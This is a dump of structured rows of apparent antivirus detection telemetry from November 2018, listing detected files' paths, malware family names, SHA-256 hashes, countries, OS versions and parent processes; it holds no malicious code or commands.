  Row(detection=Row(filename='packager.exe', filepath='H:\\WINDOWS\\$NtServicePackUninstall$\\packager.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='eb67a71422d83f433ece5455c220b4fee7e0857b4b44e0a752bc95bbc4333325', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T10:26:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T17:51:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='99c9493fe6e90f651a162ec76e7ecf597e67e69149267724432c7de9a60595a3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T15:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2010.exe', filepath='f:\\2010.exe', filesize=512000, name='HEUR/AGEN.1008018.#M1.#R1'), hash='c329456623265a3676200f3b521b2c82fbd504cb49f8487bb72520d5edfddc15', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:37:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213143-a301770b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b284a54\\AVSCAN-20181101-211056-C9AF4117\\AVSCAN-20181101-213143-A301770B', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='97d074a4ad2d25720d9c88821148d958bb5e15d92e3bf8c810b98e47fc876b9d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140630-57eccffe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-140630-57ECCFFE', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:10:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='index.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Game Pack\\Slingo\\omdata\\images\\index.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='9d2c1006e6033bb90bb165b237449b40b891779a50a139ed821f17b530dd7a76', metadata=Row(cmdline='\\\\\\/R \\\\\\/RE', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\MRT.exe', parentsize=143250520, timestamp='2018-11-01T18:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='umount.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-nfs-clientcmdtools_31bf3856ad364e35_6.1.7600.16385_none_5139b94651c5c307\\umount.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='7e2b2a8c6b77bd63ebc8bc619d700342891c096c16ea6610e371e073307dc7bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c0038ef9bcab34ed11bf1985daa97855a949a4f269616fab07f2cde553bf9c2d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-11.available\\Avira\\C0038EF9BCAB34ED11BF1985DAA97855A949A4F269616FAB07F2CDE553BF9C2D', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='c0038ef9bcab34ed11bf1985daa97855a949a4f269616fab07f2cde553bf9c2d', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:13:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0078983.exe', filepath='D:\\System Volume Information\\_restore{74287D37-4381-464D-8D02-0FE8636E81A2}\\RP327\\A0078983.exe', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='98ddf9522f992afb449837013a3c724c6f757d8447a756ee6debcd264a796b1a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8900b9feeabb336e69aa7ea8ecc1b1e43d7bf8411e06ef2b63acac86433a8c5f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\8900B9FEEABB336E69AA7EA8ECC1B1E43D7BF8411E06EF2B63ACAC86433A8C5F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8900b9feeabb336e69aa7ea8ecc1b1e43d7bf8411e06ef2b63acac86433a8c5f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111657-27e7b511', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111657-27E7B511', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='174.dll', filepath='\\\\?\\C:\\Program Files\\-ViewPassword-soft\\174.dll', filesize=192000, name='Adware/AddLyrics.192000.17.#M1.#R1'), hash='5d27ba6e0d8d2947ab021d5a26028aab3ed8a01b28028572702e42c0ab928bd3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:32:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.cache.exe', filepath='G:\\Xender\\.cache.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:51:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110731-e07e1c07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110731-E07E1C07', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185024-f62147b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8690ed0\\AVSCAN-20181101-185001-F27D56E8\\AVSCAN-20181101-185024-F62147B0', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163158-90c8200f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db3835ad\\AVSCAN-20181101-163131-8D0B425D\\AVSCAN-20181101-163158-90C8200F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T06:55:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='尚未確認的 825502.crdownload', filepath='C:\\Users\\X\\Downloads\\尚未確認的 825502.crdownload', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2a0219ffab585acbc5d514458cf6bbd3f0b6dc8a4acd387d89911fe1d95849e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2A0219FFAB585ACBC5D514458CF6BBD3F0B6DC8A4ACD387D89911FE1D95849E2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a0219ffab585acbc5d514458cf6bbd3f0b6dc8a4acd387d89911fe1d95849e2', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dxa8a.tmp', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temp\\dxa89.tmp\\dxa8A.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:45:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='900940.exe', filepath='C:\\Program Files\\Name\\900940.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:37:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='บายสีสูขวัญมัดข้าวมัดแขน.exe', filepath='E:\\picture\\บายสีสูขวัญมัดข้าวมัดแขน\\บายสีสูขวัญมัดข้าวมัดแขน.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='621d699084d45d38e9615efae0e87b1b8e9d2a8be5fbbf405585ceec6878d0f1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='\\\\\\/onboot', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3911248, timestamp='2018-11-01T09:12:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184132-35eb94f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41c160bd\\AVSCAN-20181101-184041-2D9430CB\\AVSCAN-20181101-184132-35EB94F5', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:41:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2c55e2eb5ce95f4ab3a1ac3071dbb7aad56ef8cf33dac1f24bc89192c1197e0e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2C55E2EB5CE95F4AB3A1AC3071DBB7AAD56EF8CF33DAC1F24BC89192C1197E0E', filesize=320000, name='HEUR/AGEN.1022370.#M1.#R1'), hash='2c55e2eb5ce95f4ab3a1ac3071dbb7aad56ef8cf33dac1f24bc89192c1197e0e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:27:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T02:20:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123713-724c2f3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b480eec\\AVSCAN-20181101-123653-6E91FE03\\AVSCAN-20181101-123713-724C2F3C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='0e2566c3dc29512bb4ba84812df5a9e35f6f725f3d3e34d60efb1458d055ea8d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:37:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xmancommand.exe', filepath='C:\\Program Files\\Adobe\\Adobe Extension Manager CS5.5\\XManCommand.exe', filesize=112000, name='W32/Infector.Gen.#M300.#R7863'), hash='7f0f72d655f1412678338f6e36f342553f624a48f74f8fd13927d5b5a87118ff', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Q3mw5gQ6akO5Wfrj.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T16:12:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215429-e9bb9124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6b288d7\\AVSCAN-20181101-215415-E72BBA49\\AVSCAN-20181101-215429-E9BB9124', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdgenxferfsys.dll', filepath='C:\\Program Files\\Real\\RealPlayer\\Plugins\\pdgenxferfsys.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='4a98d471a52c6e6ace48ad5037ad7f2afe08881fab43781d2290ef802e58f2c2', metadata=Row(cmdline='--engine=2 --session-id=9E9MSzTwJayVGe2jLpCwbs1IkaEPxaWUyDwcDpTq --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-01T02:39:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='7f45aed6fe42f14a6176e557916685223708d5354edccc2caff8ad686b29cab2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:47:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='D:\\Download\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:53:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:59:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b2d', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b2d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165830-6ff6ec36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3cc7820a\\AVSCAN-20181101-165741-67FEB242\\AVSCAN-20181101-165830-6FF6EC36', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:59:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212349-edeb8744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212349-EDEB8744', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212029-d0f94d13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212029-D0F94D13', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:20:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\OneKey Optimizer\\bin\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='cc60da7ff095f3c23898529ec2eb4997affe3d8d01d5d7525c204db1697b2f9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:qUv4jfh3g0m\\\\\\/0sX6.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:52:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc3555eefbf65872e526e7e8f2dc64b978d243a1617b85544c3c15183278e2e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ikwgSJNfZ0i3E+R2.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='materi tw i, puri denpasar kuningan 2018.pif', filepath='F:\\Materi TW I, Puri Denpasar Kuningan 2018\\Materi TW I, Puri Denpasar Kuningan 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='modulo6.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Moduli 1-7\\Modulo 6\\modulo6.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0112093.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0112093.exe', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='9254ec53a7518aca7468ff500b090a1d81a903035015be2127e6bd9c7590038c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T15:06:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194630-485b02f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194630-485B02F8', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:32Z'), dt=datetime.date(2018, 11, 1)),
